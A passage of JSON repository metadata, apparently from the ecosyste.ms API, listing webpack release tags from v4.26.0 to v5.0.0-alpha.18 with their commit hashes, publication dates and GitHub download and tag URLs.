.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.git